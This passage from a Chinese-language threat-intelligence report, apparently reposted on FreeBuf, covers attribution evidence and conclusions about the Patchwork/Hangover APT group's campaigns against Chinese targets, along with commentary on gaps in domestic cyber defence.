但由于SOA的內容是可以由DNS管理者自行修改，所以也不排除攻擊組織刻意修改為虛假郵箱地址等信息來達到混淆視聽的目的。

第一次攻擊行動相關C&C信息（WHOIS信息）

C&C指向同一IP

十、 幕后組織

1. 歸屬分析

PDB路徑

第一次攻擊行動

Hangover中OSX.Kumar.A樣本請求的URL是“hxxp://******one.net/yash/upload.php”，其中“yash”在針對windows平臺的其他樣本中的PDB中也出現過。

Hangover相關樣本PDB路徑

第四次攻擊行動

基礎信息

Kanishk是來自北印度語單詞，意味著“守護之神毗濕奴的媒介”，一般作為男孩的名字，相關示例如下表（名+姓）。

相關姓名示例

另外Kanishk類似Kaniska，Kanishka。

Kaniska維基百科

相關基礎信息

OSX.Kumar開發者信息

可以看到OSX.kumar家族中的蘋果開發者信息是名為：Rajinder Kuma

OSX.Kumar.B開發者相關信息

惡意代碼時間戳

通過第一次和第四次攻擊行動中樣本時間戳統計來看，首先相關結果基本接近。

我們假設攻擊者是職業組織，即與一般政府、工商等上班時間類似，則相關工作時間趨向于UTC+5 時區。

第一次攻擊行動

第四次攻擊行動

域名注冊信息

其中以*********ine.org為例，分析相關WHOIS信息。

域名注冊相關信息

2. 組織描述

組織描述表

十一、 總結

在追日團隊持續跟蹤監控摩訶草組織，通過對該組織相關TTPs的研究分析，以及結合以往跟進或披露的APT組織或攻擊行動，我們認為以下幾點是值得大家關注的：

1. APT攻擊從未停歇

從2013年Norman安全公司將摩訶草組織（即HangOver）曝光后，該組織并未因此停止相關攻擊活動，尤其從2015年至2016年期間，相關攻擊活動愈演愈烈。對摩訶草組織這四次攻擊行動的分析，我們發現其攻擊意圖中主要的攻擊目標和目的也都未發生改變，這也體現出幕后組織意志的堅定性和達到目標的決心。

另外，在跟進的APT組織或行動中，很多組織都不會因為一次攻擊行動的暴露或失敗而導致該組織停止活動或放棄目標，由于相關惡意代碼、C&C等暴露的確會給相關組織帶來一定影響，如暫時的蟄伏，而一旦該組織在重新配備資源，調整好相關戰術和技術后，就會立即發動新的攻擊。比如我們之前披露的海蓮花組織（APT-C-00），在我們披露后該組織有很短一段時間沒有活躍，但很快又恢復了“生機”，相關攻擊活動至今還很活躍。

我們認為這種從未停歇的攻擊體現出APT本身的特性，從一定角度很好的解釋了APT里P（Persistent，持續性）的涵義。針對持續的威脅，沒有一勞永逸的解決方法，與之能抗衡的就是需要我們從未停歇的對抗，持續的跟蹤監控。

2. APT攻擊“不計成本”

雖然暫時沒有直接的證據證實摩訶草組織是一個由國家支持的APT組織，但攻擊過程中所使用的大量資源，都表明這不是一個人或一般組織能承受的攻擊成本，除非幕后有一個強大的財團支持，另外，該組織相關攻擊所表達出明確的意圖和堅定的意志，這也不是個體所能達到的，結合這些客觀現象，我們認為摩訶草更有可能是由一個國家背景長期支持的APT組織。

APT組織是否會對一個目標發動攻擊，主要取決于目標的價值，而不在于目標本身的強弱程度。目標本身防御的強弱只是決定了發動相應攻擊所動用的資源，如是否采用0day漏洞，或使用一般釣魚網站攻擊即可達到效果，摩訶草組織很好的詮釋了這一點APT特性，在資源使用方面，摩訶草組織基本是對目標所存在的所有受影響攻擊面都會涉及考慮到，采用各種方式，從各個角度進行攻擊。幾乎是一種為達到目的，不擇手段，不計成本的攻擊方式。

相關攻擊行動中使用了大量漏洞，其中至少包括一次0day漏洞使用，相關惡意代碼非常繁雜。目前惡意代碼HASH數量有995個，C&C數量為731個，而且相關惡意代碼會持續的迭代更新。載荷投遞的方式，主要是以魚叉郵件進行惡意代碼的傳播，另外會涉及少量水坑攻擊，在最近一次攻擊行動中基于即時通訊工具和社交網絡也是主要的惡意代碼投遞途徑。尤其是該組織選擇了基于即時通訊工具這種高成本的攻擊。除了基于惡意代碼攻擊，還會采用釣魚網站，用一種純粹社會工程學的攻擊方法來達到目的。該組織主要除了針對Windows系統進行攻擊，同時也會針對Mac OS X系統進行攻擊，不僅如此，隨著智能移動終端的普及，針對Android的攻擊也隨之產生。

3. 中國是APT主要受害國

在今年我們發布的《2015年中國高級持續性威脅（APT）研究報告》 中已經明確指出了中國是APT攻擊的主要受害國，報告中“截至2015年11月底，360威脅情報中心監測到的針對中國境內科研教育、政府機構等組織單位發動APT攻擊的境內外黑客組織累計29個”，摩訶草組織就是這29個組織的其中之一。

摩訶草組織的主要攻擊目標是中國，進一步主要針對中國科研教育和政府機構，其主要目的是竊取敏感數據情報。摩訶草組織也代表了以中國為攻擊目標的APT組織一般所具有的特性：關注科研教育、政府機構，以竊取數據為目的。

在分析摩訶草組織過程中，我們發現在針對中國的攻擊，從2015年第三方和第四次攻擊行動中，針對中國的目標行業除了科研教育外，針對軍事領域的相關攻擊不斷增加，尤其是關于南海爭端等。也就是APT組織會緊密圍繞政治、經濟、科技、軍工等熱點領域及事件發動相關攻擊。類似“一帶一路”、“軍民融合”等是除了摩訶草組織以外，也是如海蓮花組織、APT-C-05、APT-C-12、APT-C-17等這些組織重點關注的領域。

4. 國內能力型廠商依然缺位

摩訶草組織從2009年一直活躍至今，尤其在2016相關攻擊更為活躍，另外海蓮花組織、APT-C-05、APT-C-06、APT-C-12等我們監控到的大部分APT組織都是類似，相關攻擊從未停歇而且每次攻擊行動都不會空手而歸。在《2015年中國高級持續性威脅（APT）研究報告》中指出針對中國的攻擊，往往低成本的攻擊就能達到攻擊者的預期，而導致低成本入侵頻頻得手的主要原因還是由于相關被攻擊目標防御薄弱。這是造成摩訶草組織在曝光披露后依然活躍的原因之一，但更主要的原因是檢測欠缺和響應乏力，我們在本節之后的內容中會詳細闡述。

針對每一次攻擊，無論是安全機構還是被攻擊目標都基本需要經過這幾個步驟：監控發現、分析披露、通報告警、檢測防御。從摩訶草、海蓮花組織的相關攻擊中，我們可以看到中國的大部分安全機構或被攻擊目標單位相關環節和防護措施還是存在很多問題。

首先，在國內只有很少幾家安全廠商能實現自主發現APT攻擊，一般機構都是在國外安全廠商披露后進行跟進分析，比如摩訶草最早是由Norman安全公司披露。這一現象不單單在APT攻擊事件，如其他重大安全事件和漏洞，都是類似。國內安全廠商基本基于國外披露的信息進行報告、預警提交給有關單位或部門，然后就已經“完成”了一次事件響應，關于后續的檢測防御，基本就是基于公開的IOC來進行，然而被攻擊目標單位也基本“認同”這一處置方式。

我們所說的能力型安全廠商，不僅需要完成上述跟蹤國外廠商報告的能力，更重要的是依賴自身數據或客戶數據對APT攻擊進行獨立發現、溯源與監測，進而對這些攻擊進行披露，同時還能針對這些APT攻擊為各類受害用戶提供日常的檢測與響應。

國內雖然號稱能夠檢測APT的產品很多，但是真正能夠發現、分析、溯源和防護高級威脅的安全產品依然很少，這和國內缺乏能力型安全廠商生存的空間有很大的關系。從過去360威脅情報中心或安天實驗室等能力型廠商已披露的APT組織或行動的監控來看，相關攻擊在披露后，至今在各重要政府機構依然非常活躍，攻擊中雖然新增了一些木馬變種，但不可思議的是已知木馬或C&C還很活躍。這很像是醫生與患者之間的關系，專業醫院告知患者傷口未愈，患者表示知曉，但服務于患者的家庭醫生并未給予患者縫合治愈，甚至部分患者也未對未愈的傷口表示重視，最后的結果就是患者繼續帶傷前行，直至遍體鱗傷無力倒地。這種現象確實和國內安全能力型廠商缺乏其生存的空間有很大的關系。

與上述醫患關系一樣，我們都不希望看到這種結果。如果在現在的防護體系中，能夠引入更多能力型廠商，更多能從監控發現到檢測防御每個環節打通完善，形成良性的閉合循環，各類安全廠商與被攻擊目標之間形成協同聯動，即使我們無法提前知曉摩訶草組織何時卷土重來，也無法阻止摩訶草組織發起下一次攻擊行動，但我們依然可以將后續的相關攻擊拒之門外，讓摩訶草的第五次攻擊行動化為泡影。

5. 網絡安全和信息化協同發展

習總書記在2014年2月27日下午主持召開中央網絡安全和信息化領導小組第一次會議并發表重要講話，其中強調：“網絡安全和信息化是一體之兩翼、驅動之雙輪，必須統一謀劃、統一部署、統一推進、統一實施。做好網絡安全和信息化工作，要處理好安全和發展的關系，做到協調一致、齊頭并進，以安全保發展、以發展促安全，努力建久安之勢、成長治之業。”

從摩訶草、海蓮花等的相關攻擊行動中，我們除了可以看出被攻擊目標本身防御薄弱以外，也暴露出相關信息化建設的不完善。在摩訶草組織的攻擊中我們發現有大量攻擊是通過第三方個人版本的即時通訊工具和社交網絡為起初攻擊入口來實施攻擊，進一步攻擊者所投放的釣魚網站也是假冒的第三方個人免費郵箱，這也從側面反映被攻擊目標可能以個人免費郵箱作為常用聯系工具。最后大多數APT組織在針對中國地區的魚叉郵件攻擊中，被攻擊目標所接收郵件的郵箱往往是第三方個人免費郵箱，另外攻擊者也習慣采用同類第三方免費郵箱進行載荷投遞。

從《2015年中國高級持續性威脅（APT）研究報告》中，我們可以了解到被攻擊目標主要是集中在科研教育和政府機構等領域。這兩類敏感重點行業領域更需要在建設初期就進行安全規劃，特別是與互聯網相關的個人和機構，避免將個人與工作的信息混雜，讓攻擊者找到潛在隱患的入口，最終導致機構被攻擊滲透。2016年4月19日，習近平總書記在網絡安全和信息化工作座談會上強調：“網絡安全是整體的而不是割裂的”，進一步在對APT等高級威脅的對抗過程中，除了加強網絡安全環節的建設，也需要與信息化建設統一謀劃、統一部署、統一推進和統一實施。

* 企業賬號：360安全衛士，轉載請注明來自FreeBuf黑客與極客（FreeBuf.COM）